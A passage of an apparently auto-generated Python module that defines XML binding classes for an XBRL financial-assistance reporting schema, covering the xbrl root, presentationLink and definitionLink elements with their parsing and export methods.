obj_ = divide.factory()
obj_.build(child_)
self.divide = obj_
obj_.original_tagname_ = 'divide'
# end class unit
class xbrl(GeneratedsSuper):
"""XBRL instance root element."""
subclass = None
superclass = None
def __init__(self, id=None, schemaRef=None, linkbaseRef=None, roleRef=None, arcroleRef=None, item=None, tuple=None, context=None, unit=None, footnoteLink=None):
self.original_tagname_ = None
self.id = _cast(None, id)
if schemaRef is None:
self.schemaRef = []
else:
self.schemaRef = schemaRef
if linkbaseRef is None:
self.linkbaseRef = []
else:
self.linkbaseRef = linkbaseRef
if roleRef is None:
self.roleRef = []
else:
self.roleRef = roleRef
if arcroleRef is None:
self.arcroleRef = []
else:
self.arcroleRef = arcroleRef
if item is None:
self.item = []
else:
self.item = item
if tuple is None:
self.tuple = []
else:
self.tuple = tuple
if context is None:
self.context = []
else:
self.context = context
if unit is None:
self.unit = []
else:
self.unit = unit
if footnoteLink is None:
self.footnoteLink = []
else:
self.footnoteLink = footnoteLink
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if xbrl.subclass:
return xbrl.subclass(*args_, **kwargs_)
else:
return xbrl(*args_, **kwargs_)
factory = staticmethod(factory)
def get_schemaRef(self): return self.schemaRef
def set_schemaRef(self, schemaRef): self.schemaRef = schemaRef
def add_schemaRef(self, value): self.schemaRef.append(value)
def insert_schemaRef_at(self, index, value): self.schemaRef.insert(index, value)
def replace_schemaRef_at(self, index, value): self.schemaRef[index] = value
def get_linkbaseRef(self): return self.linkbaseRef
def set_linkbaseRef(self, linkbaseRef): self.linkbaseRef = linkbaseRef
def add_linkbaseRef(self, value): self.linkbaseRef.append(value)
def insert_linkbaseRef_at(self, index, value): self.linkbaseRef.insert(index, value)
def replace_linkbaseRef_at(self, index, value): self.linkbaseRef[index] = value
def get_roleRef(self): return self.roleRef
def set_roleRef(self, roleRef): self.roleRef = roleRef
def add_roleRef(self, value): self.roleRef.append(value)
def insert_roleRef_at(self, index, value): self.roleRef.insert(index, value)
def replace_roleRef_at(self, index, value): self.roleRef[index] = value
def get_arcroleRef(self): return self.arcroleRef
def set_arcroleRef(self, arcroleRef): self.arcroleRef = arcroleRef
def add_arcroleRef(self, value): self.arcroleRef.append(value)
def insert_arcroleRef_at(self, index, value): self.arcroleRef.insert(index, value)
def replace_arcroleRef_at(self, index, value): self.arcroleRef[index] = value
def get_item(self): return self.item
def set_item(self, item): self.item = item
def add_item(self, value): self.item.append(value)
def insert_item_at(self, index, value): self.item.insert(index, value)
def replace_item_at(self, index, value): self.item[index] = value
def get_tuple(self): return self.tuple
def set_tuple(self, tuple): self.tuple = tuple
def add_tuple(self, value): self.tuple.append(value)
def insert_tuple_at(self, index, value): self.tuple.insert(index, value)
def replace_tuple_at(self, index, value): self.tuple[index] = value
def get_context(self): return self.context
def set_context(self, context): self.context = context
def add_context(self, value): self.context.append(value)
def insert_context_at(self, index, value): self.context.insert(index, value)
def replace_context_at(self, index, value): self.context[index] = value
def get_unit(self): return self.unit
def set_unit(self, unit): self.unit = unit
def add_unit(self, value): self.unit.append(value)
def insert_unit_at(self, index, value): self.unit.insert(index, value)
def replace_unit_at(self, index, value): self.unit[index] = value
def get_footnoteLink(self): return self.footnoteLink
def set_footnoteLink(self, footnoteLink): self.footnoteLink = footnoteLink
def add_footnoteLink(self, value): self.footnoteLink.append(value)
def insert_footnoteLink_at(self, index, value): self.footnoteLink.insert(index, value)
def replace_footnoteLink_at(self, index, value): self.footnoteLink[index] = value
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.schemaRef or
self.linkbaseRef or
self.roleRef or
self.arcroleRef or
self.item or
self.tuple or
self.context or
self.unit or
self.footnoteLink
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='xbrl', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='xbrl')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='xbrl', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='xbrl'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='xbrl', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for schemaRef_ in self.schemaRef:
schemaRef_.export(outfile, level, namespace_='link:', name_='schemaRef', pretty_print=pretty_print)
for linkbaseRef_ in self.linkbaseRef:
linkbaseRef_.export(outfile, level, namespace_='link:', name_='linkbaseRef', pretty_print=pretty_print)
for roleRef_ in self.roleRef:
roleRef_.export(outfile, level, namespace_='link:', name_='roleRef', pretty_print=pretty_print)
for arcroleRef_ in self.arcroleRef:
arcroleRef_.export(outfile, level, namespace_='link:', name_='arcroleRef', pretty_print=pretty_print)
for item_ in self.item:
showIndent(outfile, level, pretty_print)
outfile.write('<%sitem>%s</%sitem>%s' % (namespace_, self.gds_format_string(quote_xml(item_).encode(ExternalEncoding), input_name='item'), namespace_, eol_))
for tuple_ in self.tuple:
showIndent(outfile, level, pretty_print)
outfile.write('<%stuple>%s</%stuple>%s' % (namespace_, self.gds_format_string(quote_xml(tuple_).encode(ExternalEncoding), input_name='tuple'), namespace_, eol_))
for context_ in self.context:
context_.export(outfile, level, namespace_='xbrli:', name_='context', pretty_print=pretty_print)
for unit_ in self.unit:
unit_.export(outfile, level, namespace_='xbrli:', name_='unit', pretty_print=pretty_print)
for footnoteLink_ in self.footnoteLink:
footnoteLink_.export(outfile, level, namespace_='link:', name_='footnoteLink', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'schemaRef':
class_obj_ = self.get_class_obj_(child_, simpleType)
obj_ = class_obj_.factory()
obj_.build(child_)
self.schemaRef.append(obj_)
obj_.original_tagname_ = 'schemaRef'
elif nodeName_ == 'linkbaseRef':
obj_ = linkbaseRef.factory()
obj_.build(child_)
self.linkbaseRef.append(obj_)
obj_.original_tagname_ = 'linkbaseRef'
elif nodeName_ == 'roleRef':
obj_ = roleRef.factory()
obj_.build(child_)
self.roleRef.append(obj_)
obj_.original_tagname_ = 'roleRef'
elif nodeName_ == 'arcroleRef':
obj_ = arcroleRef.factory()
obj_.build(child_)
self.arcroleRef.append(obj_)
obj_.original_tagname_ = 'arcroleRef'
elif nodeName_ == 'item':
item_ = child_.text
item_ = self.gds_validate_string(item_, node, 'item')
self.item.append(item_)
elif nodeName_ == 'catalogOfFederalDomesticAssistanceTitle':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'catalogOfFederalDomesticAssistanceTitle'
elif nodeName_ == 'catalogOfFederalDomesticAssistanceNumber':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'catalogOfFederalDomesticAssistanceNumber'
elif nodeName_ == 'totalFundingAmount':
obj_ = amountItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'totalFundingAmount'
elif nodeName_ == 'nonFederalFundingAmount':
obj_ = amountItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'nonFederalFundingAmount'
elif nodeName_ == 'allocationTransferAgencyIdentifier':
obj_ = integerItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'allocationTransferAgencyIdentifier'
elif nodeName_ == 'mainAccountNumber':
obj_ = integerItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'mainAccountNumber'
elif nodeName_ == 'subAccountSymbol':
obj_ = integerItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'subAccountSymbol'
elif nodeName_ == 'beginningPeriodOfAvailability':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'beginningPeriodOfAvailability'
elif nodeName_ == 'endingPeriodOfAvailability':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'endingPeriodOfAvailability'
elif nodeName_ == 'availabilityTypeCode':
obj_ = availableTypeCodeItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'availabilityTypeCode'
elif nodeName_ == 'streetAddressLine':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'streetAddressLine'
elif nodeName_ == 'city':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'city'
elif nodeName_ == 'county':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'county'
elif nodeName_ == 'state':
obj_ = stateItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'state'
elif nodeName_ == 'zipCodePlus4':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'zipCodePlus4'
elif nodeName_ == 'postalCode':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'postalCode'
elif nodeName_ == 'countryName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'countryName'
elif nodeName_ == 'countryCode':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'countryCode'
elif nodeName_ == 'congressionalDistrict':
obj_ = congressionalDistrictItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'congressionalDistrict'
elif nodeName_ == 'agencyIdentifier':
obj_ = integerItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'agencyIdentifier'
elif nodeName_ == 'agencyName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'agencyName'
elif nodeName_ == 'officeIdentifier':
obj_ = integerItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'officeIdentifier'
elif nodeName_ == 'officeName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'officeName'
elif nodeName_ == 'awardID':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'awardID'
elif nodeName_ == 'awardDescription':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'awardDescription'
elif nodeName_ == 'parentAwardID':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'parentAwardID'
elif nodeName_ == 'awardeeLegalBusinessName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'awardeeLegalBusinessName'
elif nodeName_ == 'businessType':
obj_ = businessTypeItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'businessType'
elif nodeName_ == 'recordType':
obj_ = recordTypeItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'recordType'
elif nodeName_ == 'typeOfAction':
obj_ = typeOfActionItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'typeOfAction'
elif nodeName_ == 'typeOfTransactionCode':
obj_ = typeOfTransactionCodeItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'typeOfTransactionCode'
elif nodeName_ == 'modificationAmendmentNumber':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'modificationAmendmentNumber'
elif nodeName_ == 'ultimateParentUniqueIdentifier':
obj_ = integerItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'ultimateParentUniqueIdentifier'
elif nodeName_ == 'awardeeUniqueIdentifier':
obj_ = integerItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'awardeeUniqueIdentifier'
elif nodeName_ == 'awardeeUniqueIdentifierSupplemental':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'awardeeUniqueIdentifierSupplemental'
elif nodeName_ == 'ultimateParentLegalBusinessName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'ultimateParentLegalBusinessName'
elif nodeName_ == 'periodOfPerformanceActionDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'periodOfPerformanceActionDate'
elif nodeName_ == 'periodOfPerformanceStartDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'periodOfPerformanceStartDate'
elif nodeName_ == 'periodOfPerformanceCurrentEndDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'periodOfPerformanceCurrentEndDate'
elif nodeName_ == 'periodOfPerformancePotentialEndDate':
obj_ = dateItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'periodOfPerformancePotentialEndDate'
elif nodeName_ == 'highlyCompensatedOfficerFirstName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'highlyCompensatedOfficerFirstName'
elif nodeName_ == 'highlyCompensatedOfficerMiddleInitial':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'highlyCompensatedOfficerMiddleInitial'
elif nodeName_ == 'highlyCompensatedOfficerLastName':
obj_ = stringItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'highlyCompensatedOfficerLastName'
elif nodeName_ == 'highlyCompensatedOfficerCompensation':
obj_ = amountItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'highlyCompensatedOfficerCompensation'
elif nodeName_ == 'federalFundingAmount':
obj_ = amountItemType.factory()
obj_.build(child_)
self.item.append(obj_)
obj_.original_tagname_ = 'federalFundingAmount'
elif nodeName_ == 'tuple':
tuple_ = child_.text
tuple_ = self.gds_validate_string(tuple_, node, 'tuple')
self.tuple.append(tuple_)
elif nodeName_ == 'award':
obj_ = awardComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'award'
elif nodeName_ == 'awardeeInformation':
obj_ = awardeeInformationComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'awardeeInformation'
elif nodeName_ == 'catalogOfFederalDomesticAssistanceProgram':
obj_ = catalogOfFederalDomesticAssistanceProgramComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'catalogOfFederalDomesticAssistanceProgram'
elif nodeName_ == 'awardAmounts':
obj_ = awardAmountsComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'awardAmounts'
elif nodeName_ == 'periodOfPerformance':
obj_ = periodOfPerformanceComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'periodOfPerformance'
elif nodeName_ == 'treasuryAccountSymbol':
obj_ = TreasuryAccountSymbolComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'treasuryAccountSymbol'
elif nodeName_ == 'address':
obj_ = addressComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'address'
elif nodeName_ == 'streetAddress':
obj_ = streetAddressComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'streetAddress'
elif nodeName_ == 'agency':
obj_ = agencyComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'agency'
elif nodeName_ == 'agencyOffice':
obj_ = agencyOfficeComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'agencyOffice'
elif nodeName_ == 'awardeeAddress':
obj_ = addressComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'awardeeAddress'
elif nodeName_ == 'primaryPlaceOfPerformance':
obj_ = addressComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'primaryPlaceOfPerformance'
elif nodeName_ == 'awardingAgency':
obj_ = agencyComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'awardingAgency'
elif nodeName_ == 'fundingAgency':
obj_ = agencyComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'fundingAgency'
elif nodeName_ == 'awardingSubTierAgency':
obj_ = agencyComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'awardingSubTierAgency'
elif nodeName_ == 'fundingSubTierAgency':
obj_ = agencyComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'fundingSubTierAgency'
elif nodeName_ == 'highlyCompensatedOfficer':
obj_ = highlyCompensatedOfficerComplexType.factory()
obj_.build(child_)
self.tuple.append(obj_)
obj_.original_tagname_ = 'highlyCompensatedOfficer'
elif nodeName_ == 'context':
obj_ = context.factory()
obj_.build(child_)
self.context.append(obj_)
obj_.original_tagname_ = 'context'
elif nodeName_ == 'unit':
obj_ = unit.factory()
obj_.build(child_)
self.unit.append(obj_)
obj_.original_tagname_ = 'unit'
elif nodeName_ == 'footnoteLink':
obj_ = footnoteLink.factory()
obj_.build(child_)
self.footnoteLink.append(obj_)
obj_.original_tagname_ = 'footnoteLink'
# end class xbrl
class presentationLink(GeneratedsSuper):
"""presentation extended link element definition."""
subclass = None
superclass = None
def __init__(self, title=None, documentation=None, loc=None, presentationArc=None):
self.original_tagname_ = None
if title is None:
self.title = []
else:
self.title = title
if documentation is None:
self.documentation = []
else:
self.documentation = documentation
if loc is None:
self.loc = []
else:
self.loc = loc
if presentationArc is None:
self.presentationArc = []
else:
self.presentationArc = presentationArc
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if presentationLink.subclass:
return presentationLink.subclass(*args_, **kwargs_)
else:
return presentationLink(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def add_title(self, value): self.title.append(value)
def insert_title_at(self, index, value): self.title.insert(index, value)
def replace_title_at(self, index, value): self.title[index] = value
def get_documentation(self): return self.documentation
def set_documentation(self, documentation): self.documentation = documentation
def add_documentation(self, value): self.documentation.append(value)
def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
def replace_documentation_at(self, index, value): self.documentation[index] = value
def get_loc(self): return self.loc
def set_loc(self, loc): self.loc = loc
def add_loc(self, value): self.loc.append(value)
def insert_loc_at(self, index, value): self.loc.insert(index, value)
def replace_loc_at(self, index, value): self.loc[index] = value
def get_presentationArc(self): return self.presentationArc
def set_presentationArc(self, presentationArc): self.presentationArc = presentationArc
def add_presentationArc(self, value): self.presentationArc.append(value)
def insert_presentationArc_at(self, index, value): self.presentationArc.insert(index, value)
def replace_presentationArc_at(self, index, value): self.presentationArc[index] = value
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.title or
self.documentation or
self.loc or
self.presentationArc
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='presentationLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='presentationLink')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='presentationLink', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='presentationLink'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='presentationLink', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for title_ in self.title:
title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
for documentation_ in self.documentation:
documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
for loc_ in self.loc:
loc_.export(outfile, level, namespace_='link:', name_='loc', pretty_print=pretty_print)
for presentationArc_ in self.presentationArc:
presentationArc_.export(outfile, level, namespace_='link:', name_='presentationArc', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'title':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <title> element')
self.title.append(obj_)
obj_.original_tagname_ = 'title'
elif nodeName_ == 'documentation':
type_name_ = child_.attrib.get(
'{http://www.w3.org/2001/XMLSchema-instance}type')
if type_name_ is None:
type_name_ = child_.attrib.get('type')
if type_name_ is not None:
type_names_ = type_name_.split(':')
if len(type_names_) == 1:
type_name_ = type_names_[0]
else:
type_name_ = type_names_[1]
class_ = globals()[type_name_]
obj_ = class_.factory()
obj_.build(child_)
else:
raise NotImplementedError(
'Class not implemented for <documentation> element')
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'documentation':
obj_ = documentationType.factory()
obj_.build(child_)
self.documentation.append(obj_)
obj_.original_tagname_ = 'documentation'
elif nodeName_ == 'loc':
obj_ = locatorType.factory()
obj_.build(child_)
self.loc.append(obj_)
obj_.original_tagname_ = 'loc'
elif nodeName_ == 'presentationArc':
obj_ = presentationArc.factory()
obj_.build(child_)
self.presentationArc.append(obj_)
obj_.original_tagname_ = 'presentationArc'
# end class presentationLink
class definitionLink(GeneratedsSuper):
"""definition extended link element definition"""
subclass = None
superclass = None
def __init__(self, title=None, documentation=None, loc=None, definitionArc=None):
self.original_tagname_ = None
if title is None:
self.title = []
else:
self.title = title
if documentation is None:
self.documentation = []
else:
self.documentation = documentation
if loc is None:
self.loc = []
else:
self.loc = loc
if definitionArc is None:
self.definitionArc = []
else:
self.definitionArc = definitionArc
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if definitionLink.subclass:
return definitionLink.subclass(*args_, **kwargs_)
else:
return definitionLink(*args_, **kwargs_)
factory = staticmethod(factory)
def get_title(self): return self.title
def set_title(self, title): self.title = title
def add_title(self, value): self.title.append(value)
def insert_title_at(self, index, value): self.title.insert(index, value)
def replace_title_at(self, index, value): self.title[index] = value
def get_documentation(self): return self.documentation
def set_documentation(self, documentation): self.documentation = documentation
def add_documentation(self, value): self.documentation.append(value)
def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
def replace_documentation_at(self, index, value): self.documentation[index] = value
def get_loc(self): return self.loc
def set_loc(self, loc): self.loc = loc
def add_loc(self, value): self.loc.append(value)
def insert_loc_at(self, index, value): self.loc.insert(index, value)
def replace_loc_at(self, index, value): self.loc[index] = value
def get_definitionArc(self): return self.definitionArc
def set_definitionArc(self, definitionArc): self.definitionArc = definitionArc
def add_definitionArc(self, value): self.definitionArc.append(value)
def insert_definitionArc_at(self, index, value): self.definitionArc.insert(index, value)
def replace_definitionArc_at(self, index, value): self.definitionArc[index] = value
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.title or
self.documentation or
self.loc or
self.definitionArc
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='definitionLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='definitionLink')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='definitionLink', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='definitionLink'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='definitionLink', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for title_ in self.title:
title_.export(outfile, level, namespace_, name_='title', pretty_print=pretty_print)
for documentation_ in self.documentation:
documentation_.export(outfile, level, namespace_, name_='documentation', pretty_print=pretty_print)
